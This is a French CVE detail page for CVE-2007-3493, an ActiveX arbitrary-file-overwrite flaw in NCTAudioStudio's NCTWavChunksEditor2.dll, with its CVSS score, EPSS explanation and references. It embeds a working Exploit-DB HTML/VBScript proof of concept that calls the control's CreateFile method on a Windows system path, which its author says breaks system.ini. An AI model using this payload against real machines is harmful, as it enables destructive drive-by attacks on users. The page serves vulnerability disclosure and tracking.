CVE-2007-3493 : Détail

CVE-2007-3493

43.02%V4
Network
2007-06-29
16h00 +00:00
2017-09-28
10h57 +00:00
Notifications pour un CVE
Restez informé de toutes modifications pour un CVE spécifique.
Gestion des notifications

Descriptions du CVE

A certain ActiveX control in NCTWavChunksEditor2.dll 2.6.1.148 in NCTAudioStudio (NCTAudioStudio2) 2.7, as used by Sienzo DMM and probably other products, allows remote attackers to create or overwrite arbitrary files via a full pathname in the argument to the CreateFile method, a different product than CVE-2007-3400.

Informations du CVE

Métriques

Métriques Score Gravité CVSS Vecteur Source
V2 7.5 AV:N/AC:L/Au:N/C:P/I:P/A:P nvd@nist.gov

EPSS

EPSS est un modèle de notation qui prédit la probabilité qu'une vulnérabilité soit exploitée.

Score EPSS

Le modèle EPSS produit un score de probabilité compris entre 0 et 1 (0 et 100 %). Plus la note est élevée, plus la probabilité qu'une vulnérabilité soit exploitée est grande.

Percentile EPSS

Le percentile est utilisé pour classer les CVE en fonction de leur score EPSS. Par exemple, une CVE dans le 95e percentile selon son score EPSS est plus susceptible d'être exploitée que 95 % des autres CVE. Ainsi, le percentile sert à comparer le score EPSS d'une CVE par rapport à d'autres CVE.

Informations sur l'Exploit

Exploit Database EDB-ID : 4109

Date de publication : 2007-06-25 22h00 +00:00
Auteur : shinnai
EDB Vérifié : Yes

<pre> <code><span style="font: 10pt Courier New;"><span class="general1-symbol">-------------------------------------------------------------------------------------------------- <b>NCTAudioStudio2 ActiveX DLL (NCTWavChunksEditor2.dll v. 2.6.1.148) "CreateFile()"Insecure Method</b> url: http://www.nctsoft.com/products/NCTAudioEditor2/ author: shinnai mail: shinnai[at]autistici[dot]org site: http://shinnai.altervista.org This was written for educational purpose. Use it at your own risk. Author will be not be responsible for any damage. <b><font color="#FF0000">THE EXPLOIT WILL OWERWRITE THE system.ini FILE SO BE SURE TO MAKE A COPY OF IT BEFORE RUN THIS EXPLOIT OR YOUR PC WILL NOT RESTART!</font></b> Tested on Windows XP Professional SP2 all patched, with Internet Explorer 7 all software that use this ocx (for example Sienzo DMM) are vulnerable to this exploits. -------------------------------------------------------------------------------------------------- <object classid='clsid:A77849B6-6125-4466-88DC-4855C014A0C4' id='test'></object> <input language=VBScript onclick=tryMe() type=button value="Click here to start the test"> <script language='vbscript'> Sub tryMe On Error Resume Next Dim MyMsg If(MsgBox("This was written for educational purpose. Use it at your own risk." & vbCrLf & _ "Author will be not be responsible for any damage." & vbCrLf & vbCrLf & _ "THIS EXPLOIT WILL OWERWRITE THE system.ini FILE SO BE SURE TO MAKE A COPY" & _ " OF IT BEFORE RUN THIS EXPLOIT OR YOUR PC WILL NOT RESTART!" & VBcRlF & "ARE YOU" & _ " SURE YOU REALLY WANT TO RUN THIS EXPLOIT?",4)=vbYes) Then test.CreateFile "c:\windows\system_.ini" MyMsg = MsgBox ("Check now the file system.ini" & vbCrLf & "It's overwritten.", 64,"NCTAudioStudio2") Else MyMsg = MsgBox ("Nice, be safe!", 64, "NCTAudioStudio2") End If End Sub </script> </span></span> </code></pre> # milw0rm.com [2007-06-26]

Products Mentioned

Configuraton 0

Microsoft>>Windows_xp >> Version *

Microsoft>>Internet_explorer >> Version 7.0

Nctsoft_products>>Nctaudiostudio >> Version 2.7

    Nctsoft_products>>Nctwavchunkseditor2.dll >> Version 2.6.1.148

      Références

      https://www.exploit-db.com/exploits/4109
      Tags : exploit, x_refsource_EXPLOIT-DB
      http://osvdb.org/37673
      Tags : vdb-entry, x_refsource_OSVDB
      http://secunia.com/advisories/25851
      Tags : third-party-advisory, x_refsource_SECUNIA
      http://www.securityfocus.com/bid/24656
      Tags : vdb-entry, x_refsource_BID
      http://www.vupen.com/english/advisories/2007/2351
      Tags : vdb-entry, x_refsource_VUPEN